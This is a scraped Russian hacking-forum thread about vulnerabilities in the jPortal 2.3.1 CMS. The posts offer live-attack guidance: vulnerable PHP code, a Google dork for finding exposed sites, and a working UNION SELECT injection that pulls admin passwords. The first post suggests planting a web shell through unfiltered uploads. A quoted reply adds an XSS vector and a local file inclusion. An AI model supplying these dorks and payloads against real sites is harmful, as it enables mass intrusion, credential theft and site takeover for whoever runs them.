Форум АНТИЧАТ - JPoprtal 2.3.1 и ниже SQL иньекция.

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - JPoprtal 2.3.1 и ниже SQL иньекция. (https://forum.antichat.xyz/showthread.php?t=53200)

JPoprtal 2.3.1 и ниже SQL иньекция.

Популярная в Польше CMS.
Я не стану описывать все скули что были найдены в этой CMS, некоторые есть и в паблике. Эта уязвимость наиболее "удобна" и нигде не засвечена.
Уязвимо большинство сайтов, все версии. На официальном сайте просто защита от "хакеров", но и он уязвим.

Уязвимый код:

PHP код:


		
			
function topic_name($a) 

{    

global $topic_tbl;

$query = "SELECT * FROM $topic_tbl WHERE id=$a";

$result = mysql_query($query);  

$r = mysql_fetch_array($result);    

return '<a href="articles.php?topic='.$a.'" class="t_main">'.$r['title'].'</a>';  

}

Дорк:intext:"jPORTAL 2" & inurl:"articles.php?topic="

Код:

articles.php?topic=-3+union+select+1,pass,3,4,5+from+admins/

В более старых версиях jp_admins. Также есть таблица users или jp_users.

Шелл заливать двумя способами: Аплоад файлов без фильтра или блоки, позволяющие вставлять php код.

ещё одна https://forum.antichat.ru/thread53101.html
ЗЫ один минус: на многих стоят детекторы атаки sql-inj

_http://milw0rm.com/exploits/4614

JPoprtal 2.3.1 Passive XSS and Local File Inclusion.

Passive XSS in "theme/Default/index.php" :

Код:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>

<title><? echo $site_name ?> - <? echo $site_title ?></title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<? echo $head_info ?>

<? echo $meta_info ?>

<link rel="stylesheet" href="<? echo "theme/$theme/"; ?>style.css" type="text/css">

Если registers_global=On, то через переменные $site_name, $site_title, $head_info, $meta_info
и $theme можно передать XSS-вектор.
Аналогичные уязвимости в файлах theme/Default/normal.php и theme/Default/no_menu.php.

Local File Inclusion in "module.php":

Код:

function module($op) {

global $error;



if(file_exists('module/'.$op.'.aim.php')) {

include('module/'.$op.'.aim.php'); /* (2) */

} elseif($op=='') {

header("Location: index.php");

exit;

} else {

$error = 'e1';

}

}

[...]

module($op); /* (1) */

Переменная $op передается в функцию module() [1] через GET,
затем в include() [2] $op используется как есть.

(с)Daath

Цитата:

Сообщение от [53x]Shadow

Passive XSS in "theme/Default/index.php" :

Код:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>

<title><? echo $site_name ?> - <? echo $site_title ?></title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<? echo $head_info ?>

<? echo $meta_info ?>

<link rel="stylesheet" href="<? echo "theme/$theme/"; ?>style.css" type="text/css">

Код:

function module($op) {

global $error;



if(file_exists('module/'.$op.'.aim.php')) {

include('module/'.$op.'.aim.php'); /* (2) */

} elseif($op=='') {

header("Location: index.php");

exit;

} else {

$error = 'e1';

}

}

[...]

module($op); /* (1) */

Переменная $op передается в функцию module() [1] через GET,
затем в include() [2] $op используется как есть.

(с)Daath

Насчет локал инклуда могу сказать точно - большинство сайтов от него закрыты. Я не стал его постить поэтому. Про ксс тоже знал, правда активную. Кое где ее неумело поприменяли=) Но рыть ее не стал.